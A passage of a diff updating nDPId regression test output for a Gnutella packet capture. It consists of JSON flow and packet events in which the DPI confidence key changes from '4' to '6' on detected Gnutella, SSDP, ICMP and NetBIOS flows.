00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":72852,"flow_last_seen":192908,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.236.247.120","src_port":28681,"dst_port":16047,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5643,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":192907,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":373498,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.99.222.36","src_port":28681,"dst_port":44988,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -2814,14 +2814,14 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5717,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":2,"flow_last_seen":381404,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":381404,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0860AAIARiigKAAIPgS0vp3AJGMoAIFhpR05EEEAfAQFUC1FLUlAGUk5BXS\/iNQlw"} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":399168,"flow_last_seen":399168,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":399168,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":399168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":399168,"pkt":"UlQAEjUCCAAn5uVZCABFAAA854sAAIAR\/DEKAAIPaJziSHAJ0AoAKHNuYiULNAANuxoAAAAAAAAAADEBAAkAAABHVEtHCQABAAA="} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":399168,"flow_last_seen":399168,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":399168,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":399168,"flow_last_seen":399168,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":399168,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":2,"flow_last_seen":399265,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":399265,"pkt":"CAAn5uVZUlQAEjUCCABFAABEDoMAAEARFTNonOJICgACD9AKcAkAMN2JYiULNAANuxpiJQs1AA5dgzEBABEAAABHVEtHCgABAABiJQs1AA5ddw=="} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400018,"flow_last_seen":400018,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":400018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":400018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":400018,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LcAAAER3GIKAAIP7\/\/\/+sQlB2wAtikJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400018,"flow_last_seen":400018,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":400018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400018,"flow_last_seen":400018,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":400018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400872,"flow_last_seen":400872,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":400872,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":400872,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":400872,"pkt":"UlQAEjUCCAAn5uVZCABFAAA8Bs8AAIAREesKAAIPaO6s+nAJW\/wAKKTOYiULNgAJMscAAAAAAAAAADEBAAkAAABHVEtHCQABAAA="} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400872,"flow_last_seen":400872,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":400872,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5915,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":400872,"flow_last_seen":400872,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":400872,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially 
Dangerous","category":"Download"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5917,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":2,"flow_last_seen":400901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":400901,"pkt":"CAAn5uVZUlQAEjUCCABFAABEDpQAAEARSh5o7qz6CgACD1v8cAkAMAJCYiULNgAJMsdiJQs2AAlj5TEBABEAAABHVEtHCgABAABiJQs2AAljxQ=="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":2,"flow_last_seen":401028,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":401028,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LgAAAER3GEKAAIP7\/\/\/+sQlB2wAtikJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5928,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":3,"flow_last_seen":402032,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":402032,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LkAAAER3GAKAAIP7\/\/\/+sQlB2wAtikJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 
@@ -2835,7 +2835,7 @@ 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229240,"flow_last_seen":229240,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.35.190.5","src_port":28681,"dst_port":18604,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.185.126","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.185.126","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":288409,"flow_last_seen":288409,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"164.132.10.25","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.122.233.15","src_port":28681,"dst_port":11488,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6044,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":229239,"flow_last_seen":229239,"flow_idle_time":200000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":414496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.122.233.15","src_port":28681,"dst_port":11488,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6149,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":243620,"flow_last_seen":243620,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":424016,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"62.102.148.166","src_port":28681,"dst_port":31332,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -2876,7 +2876,7 @@ 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6149,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":243616,"flow_last_seen":288106,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":424016,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":28681,"dst_port":29545,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431178,"flow_last_seen":431178,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":431178,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":431178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":431178,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHP4AAIARA\/0KAAIPCgAC\/wCKAIoA0frqEQKcMAoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQAAUwcATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} 
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431178,"flow_last_seen":431178,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":431178,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431178,"flow_last_seen":431178,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":431178,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431829,"flow_last_seen":431829,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":431829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.132.75.56","src_port":28681,"dst_port":56009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":431829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":431829,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QZQAAIAR3lkKAAIPw4RLOHAJ2skAIDh8R05EEEAkAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":3,"flow_last_seen":431830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":431830,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0mm4AAIARSEcKAAIPQ8EINHAJlrgAID9OR05EEEArAQFUC1FLUlAGUk5BXS\/iNQlw"} 
@@ -3076,48 +3076,48 @@ 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82059,"flow_last_seen":433137,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.59.253.186","src_port":28681,"dst_port":15555,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":431831,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.15.182","src_port":28681,"dst_port":37829,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":431829,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.239.62.213","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":90005,"flow_last_seen":287355,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4793,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82063,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83520,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
